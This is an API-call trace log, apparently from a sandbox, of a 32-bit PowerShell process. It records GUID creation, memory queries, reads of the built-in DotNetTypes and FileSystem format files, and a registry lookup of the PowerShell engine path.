	[0160.700] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x5dde118c, Data2=0x23d6, Data3=0x419f, Data4=([0]=0xb3, [1]=0x9, [2]=0x1b, [3]=0x56, [4]=0xd3, [5]=0x1f, [6]=0xeb, [7]=0xff))) returned 0x0
	[0160.700] VirtualQuery (in: lpAddress=0x10d494, lpBuffer=0x10e494, dwLength=0x1c | out: lpBuffer=0x10e494*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.700] VirtualQuery (in: lpAddress=0x10d3ac, lpBuffer=0x10e3ac, dwLength=0x1c | out: lpBuffer=0x10e3ac*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.703] VirtualQuery (in: lpAddress=0x10d060, lpBuffer=0x10e060, dwLength=0x1c | out: lpBuffer=0x10e060*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.703] VirtualQuery (in: lpAddress=0x10d060, lpBuffer=0x10e060, dwLength=0x1c | out: lpBuffer=0x10e060*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.704] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x6c9d260b, Data2=0xe0d6, Data3=0x4118, Data4=([0]=0xb6, [1]=0x7d, [2]=0x8a, [3]=0xc2, [4]=0x12, [5]=0x2c, [6]=0xdc, [7]=0x2))) returned 0x0
	[0160.704] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xfc65bf7d, Data2=0x6a68, Data3=0x4038, Data4=([0]=0xa5, [1]=0xfa, [2]=0xb8, [3]=0x64, [4]=0xf5, [5]=0x16, [6]=0x7f, [7]=0xdf))) returned 0x0
	[0160.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.704] GetLastError () returned 0x57
	[0160.704] SetErrorMode (uMode=0x1) returned 0x1
	[0160.704] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x348
	[0160.704] GetLastError () returned 0x0
	[0160.704] GetFileType (hFile=0x348) returned 0x1
	[0160.705] SetErrorMode (uMode=0x1) returned 0x1
	[0160.705] GetFileType (hFile=0x348) returned 0x1
	[0160.705] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.705] GetLastError () returned 0x0
	[0160.705] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.705] GetLastError () returned 0x0
	[0160.705] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.705] GetLastError () returned 0x0
	[0160.705] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.705] GetLastError () returned 0x0
	[0160.705] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.706] GetLastError () returned 0x0
	[0160.706] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.706] GetLastError () returned 0x0
	[0160.706] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.706] GetLastError () returned 0x0
	[0160.706] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.706] GetLastError () returned 0x0
	[0160.708] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.708] GetLastError () returned 0x0
	[0160.708] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.708] GetLastError () returned 0x0
	[0160.708] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.708] GetLastError () returned 0x0
	[0160.709] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.709] GetLastError () returned 0x0
	[0160.709] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.709] GetLastError () returned 0x0
	[0160.709] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.709] GetLastError () returned 0x0
	[0160.709] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.710] GetLastError () returned 0x0
	[0160.710] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.710] GetLastError () returned 0x0
	[0160.714] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.714] GetLastError () returned 0x0
	[0160.714] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0xbce, lpOverlapped=0x0) returned 1
	[0160.714] GetLastError () returned 0x0
	[0160.715] ReadFile (in: hFile=0x348, lpBuffer=0x2c2b19e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2b19e*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0160.715] GetLastError () returned 0x0
	[0160.715] ReadFile (in: hFile=0x348, lpBuffer=0x2c2ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2c2ba30*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0160.715] GetLastError () returned 0x0
	[0160.715] CloseHandle (hObject=0x348) returned 1
	[0160.715] GetLastError () returned 0x0
	[0160.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.715] GetLastError () returned 0x0
	[0160.715] SetErrorMode (uMode=0x1) returned 0x1
	[0160.715] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2c4ca2c | out: lpFileInformation=0x2c4ca2c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0160.715] GetLastError () returned 0x0
	[0160.716] SetErrorMode (uMode=0x1) returned 0x1
	[0160.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.716] GetLastError () returned 0x0
	[0160.716] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e598 | out: phkResult=0x10e598*=0x348) returned 0x0
	[0160.716] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x0, lpcbData=0x10e5dc*=0x0 | out: lpType=0x10e5e0*=0x1, lpData=0x0, lpcbData=0x10e5dc*=0x56) returned 0x0
	[0160.716] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x584bc0, lpcbData=0x10e5dc*=0x56 | out: lpType=0x10e5e0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e5dc*=0x56) returned 0x0
	[0160.716] RegCloseKey (hKey=0x348) returned 0x0
	[0160.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.717] GetLastError () returned 0x0
	[0160.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.717] GetLastError () returned 0x0
	[0160.718] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xb220fdd2, Data2=0xca8d, Data3=0x4452, Data4=([0]=0x98, [1]=0x91, [2]=0x5f, [3]=0x32, [4]=0xf, [5]=0x5d, [6]=0x82, [7]=0x30))) returned 0x0
	[0160.718] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x32e88dba, Data2=0x859c, Data3=0x458c, Data4=([0]=0xa8, [1]=0xe4, [2]=0x1d, [3]=0x52, [4]=0xa6, [5]=0x43, [6]=0x1f, [7]=0x1f))) returned 0x0
	[0160.718] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x39ccd998, Data2=0xade5, Data3=0x4c8a, Data4=([0]=0xbe, [1]=0x39, [2]=0xea, [3]=0xc9, [4]=0xea, [5]=0x61, [6]=0x6, [7]=0x3c))) returned 0x0
	[0160.718] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xae43cd70, Data2=0xbb8d, Data3=0x48aa, Data4=([0]=0xa7, [1]=0x2b, [2]=0x80, [3]=0xca, [4]=0xbc, [5]=0xe6, [6]=0x3d, [7]=0x4b))) returned 0x0
	[0160.718] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x5ad1e091, Data2=0x865, Data3=0x44b5, Data4=([0]=0x80, [1]=0xa5, [2]=0x3a, [3]=0x47, [4]=0x47, [5]=0xe6, [6]=0xa8, [7]=0xb5))) returned 0x0
	[0160.718] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xc915f355, Data2=0xa0f2, Data3=0x4301, Data4=([0]=0x90, [1]=0xb, [2]=0x34, [3]=0x1d, [4]=0xb, [5]=0xf0, [6]=0x24, [7]=0x4b))) returned 0x0
	[0160.718] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.718] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x6ef84b70, Data2=0x5e2e, Data3=0x4c68, Data4=([0]=0xb7, [1]=0x77, [2]=0xda, [3]=0x82, [4]=0x67, [5]=0x12, [6]=0x5c, [7]=0xf1))) returned 0x0
	[0160.719] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.719] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.719] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x912e784e, Data2=0xc3e5, Data3=0x4170, Data4=([0]=0xa7, [1]=0x14, [2]=0xec, [3]=0xef, [4]=0x43, [5]=0xb7, [6]=0xeb, [7]=0x7b))) returned 0x0
	[0160.719] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xd4d2986c, Data2=0x4648, Data3=0x485b, Data4=([0]=0x9b, [1]=0x64, [2]=0x53, [3]=0x7, [4]=0xbc, [5]=0xba, [6]=0x47, [7]=0x55))) returned 0x0
	[0160.719] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xb39334a, Data2=0x7d86, Data3=0x43ad, Data4=([0]=0x9e, [1]=0x8b, [2]=0xcd, [3]=0x19, [4]=0x79, [5]=0xc, [6]=0x72, [7]=0xfe))) returned 0x0
	[0160.719] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xace77158, Data2=0xcc04, Data3=0x4011, Data4=([0]=0xa4, [1]=0x72, [2]=0x42, [3]=0x5e, [4]=0x8c, [5]=0x89, [6]=0x11, [7]=0x5d))) returned 0x0
	[0160.719] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.719] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x57a3dffa, Data2=0x603a, Data3=0x42bc, Data4=([0]=0xaa, [1]=0xe1, [2]=0x8a, [3]=0xf7, [4]=0x27, [5]=0x4, [6]=0x3, [7]=0xc1))) returned 0x0
	[0160.720] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.720] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.720] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.721] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.721] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.721] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xf7b46eae, Data2=0x766b, Data3=0x4489, Data4=([0]=0x8c, [1]=0xfc, [2]=0xe9, [3]=0x58, [4]=0xb4, [5]=0xb8, [6]=0x52, [7]=0x2e))) returned 0x0
	[0160.722] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xe556f89e, Data2=0xca9a, Data3=0x4b3a, Data4=([0]=0xb0, [1]=0x6e, [2]=0x43, [3]=0x4d, [4]=0xc0, [5]=0x96, [6]=0x5e, [7]=0xf5))) returned 0x0
	[0160.722] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x5b139f97, Data2=0x62d5, Data3=0x475e, Data4=([0]=0xb8, [1]=0x68, [2]=0xc1, [3]=0x73, [4]=0xd, [5]=0xc5, [6]=0x9a, [7]=0x60))) returned 0x0
	[0160.722] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xb94ee557, Data2=0x4f96, Data3=0x4df4, Data4=([0]=0xa1, [1]=0xe1, [2]=0x15, [3]=0x84, [4]=0xc7, [5]=0xf0, [6]=0xd4, [7]=0x8b))) returned 0x0
	[0160.722] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x75308236, Data2=0x9a9f, Data3=0x428d, Data4=([0]=0xa1, [1]=0x50, [2]=0x5a, [3]=0x67, [4]=0x0, [5]=0x30, [6]=0x45, [7]=0xc7))) returned 0x0
	[0160.722] VirtualQuery (in: lpAddress=0x10d494, lpBuffer=0x10e494, dwLength=0x1c | out: lpBuffer=0x10e494*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.722] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x1a725772, Data2=0x94fe, Data3=0x42eb, Data4=([0]=0xbb, [1]=0x8c, [2]=0x32, [3]=0x7d, [4]=0xc9, [5]=0xd5, [6]=0xc7, [7]=0x9))) returned 0x0
	[0160.722] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xd7646aff, Data2=0xb3f3, Data3=0x4d9b, Data4=([0]=0xaf, [1]=0xe6, [2]=0x3d, [3]=0xec, [4]=0x40, [5]=0xf4, [6]=0x9a, [7]=0x7a))) returned 0x0
	[0160.722] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xccb29494, Data2=0x83dc, Data3=0x4a11, Data4=([0]=0x90, [1]=0x63, [2]=0x3e, [3]=0xe3, [4]=0x59, [5]=0x25, [6]=0x8a, [7]=0x95))) returned 0x0
	[0160.723] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x16e1ad65, Data2=0x35a6, Data3=0x4f92, Data4=([0]=0x81, [1]=0x7a, [2]=0x91, [3]=0x84, [4]=0x3c, [5]=0x4e, [6]=0xe1, [7]=0xfb))) returned 0x0
	[0160.723] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x71795048, Data2=0x2e4a, Data3=0x4c9c, Data4=([0]=0x99, [1]=0xbb, [2]=0xf1, [3]=0xa5, [4]=0xf, [5]=0x75, [6]=0x66, [7]=0x28))) returned 0x0
	[0160.723] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x6cb56003, Data2=0xfdb1, Data3=0x475d, Data4=([0]=0x9e, [1]=0x84, [2]=0x5a, [3]=0x6f, [4]=0x3, [5]=0x45, [6]=0xd9, [7]=0xef))) returned 0x0
	[0160.723] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xfbfc94ff, Data2=0x9610, Data3=0x4cc0, Data4=([0]=0xa6, [1]=0x1f, [2]=0x1f, [3]=0x5e, [4]=0x59, [5]=0xdb, [6]=0x1c, [7]=0xfd))) returned 0x0
	[0160.723] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x11bf204c, Data2=0x245f, Data3=0x438d, Data4=([0]=0xa8, [1]=0xcd, [2]=0xec, [3]=0xe4, [4]=0xbc, [5]=0xd9, [6]=0xde, [7]=0x67))) returned 0x0
	[0160.723] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x74bc5e1b, Data2=0xe541, Data3=0x4de4, Data4=([0]=0x82, [1]=0xbc, [2]=0x12, [3]=0x20, [4]=0x98, [5]=0xb4, [6]=0x43, [7]=0xd3))) returned 0x0
	[0160.723] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x168bbfee, Data2=0xd5da, Data3=0x4985, Data4=([0]=0xa0, [1]=0x5c, [2]=0x72, [3]=0x3e, [4]=0xf2, [5]=0x73, [6]=0xcf, [7]=0x9a))) returned 0x0
	[0160.724] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x846aa6c1, Data2=0x89ab, Data3=0x4798, Data4=([0]=0x8b, [1]=0xbc, [2]=0x23, [3]=0xb3, [4]=0x86, [5]=0xb6, [6]=0xf2, [7]=0xdc))) returned 0x0
	[0160.724] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xcfbea595, Data2=0xc56, Data3=0x4ae1, Data4=([0]=0x84, [1]=0x98, [2]=0x94, [3]=0xa8, [4]=0x69, [5]=0x1f, [6]=0x73, [7]=0xaf))) returned 0x0
	[0160.724] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x2db8476f, Data2=0xc58a, Data3=0x4b45, Data4=([0]=0x9c, [1]=0xa0, [2]=0x50, [3]=0x36, [4]=0xaa, [5]=0xf6, [6]=0xb4, [7]=0x13))) returned 0x0
	[0160.724] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xce28b2a2, Data2=0xa434, Data3=0x4064, Data4=([0]=0xb6, [1]=0x78, [2]=0x79, [3]=0xf6, [4]=0xc0, [5]=0x83, [6]=0x5f, [7]=0x3b))) returned 0x0
	[0160.724] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x8f0893cb, Data2=0x7775, Data3=0x4ce0, Data4=([0]=0x98, [1]=0x59, [2]=0x32, [3]=0x61, [4]=0x84, [5]=0x75, [6]=0x30, [7]=0x4c))) returned 0x0
	[0160.724] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x6c7e842f, Data2=0xbdc6, Data3=0x4ba0, Data4=([0]=0xa5, [1]=0x36, [2]=0x76, [3]=0xbb, [4]=0xf5, [5]=0x3a, [6]=0x78, [7]=0xb))) returned 0x0
	[0160.724] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xbf101aa5, Data2=0x5ab1, Data3=0x460b, Data4=([0]=0xa6, [1]=0x65, [2]=0xb5, [3]=0xa6, [4]=0xdd, [5]=0x87, [6]=0x4d, [7]=0xa8))) returned 0x0
	[0160.724] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x3c2a54c6, Data2=0x5da0, Data3=0x4030, Data4=([0]=0xb3, [1]=0xe2, [2]=0x8f, [3]=0x9, [4]=0x9a, [5]=0xdc, [6]=0x80, [7]=0xde))) returned 0x0
	[0160.725] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x2827b9dd, Data2=0x6b00, Data3=0x4089, Data4=([0]=0xa7, [1]=0x7a, [2]=0x32, [3]=0xa3, [4]=0x50, [5]=0x76, [6]=0x69, [7]=0x63))) returned 0x0
	[0160.725] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.725] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.726] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.947] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x821074b3, Data2=0x417c, Data3=0x4e75, Data4=([0]=0xa2, [1]=0x36, [2]=0x5b, [3]=0x75, [4]=0xbd, [5]=0x19, [6]=0x8e, [7]=0xd2))) returned 0x0
	[0160.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.947] GetLastError () returned 0x0
	[0160.947] SetErrorMode (uMode=0x1) returned 0x1
	[0160.947] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x348
	[0160.947] GetLastError () returned 0x0
	[0160.947] GetFileType (hFile=0x348) returned 0x1
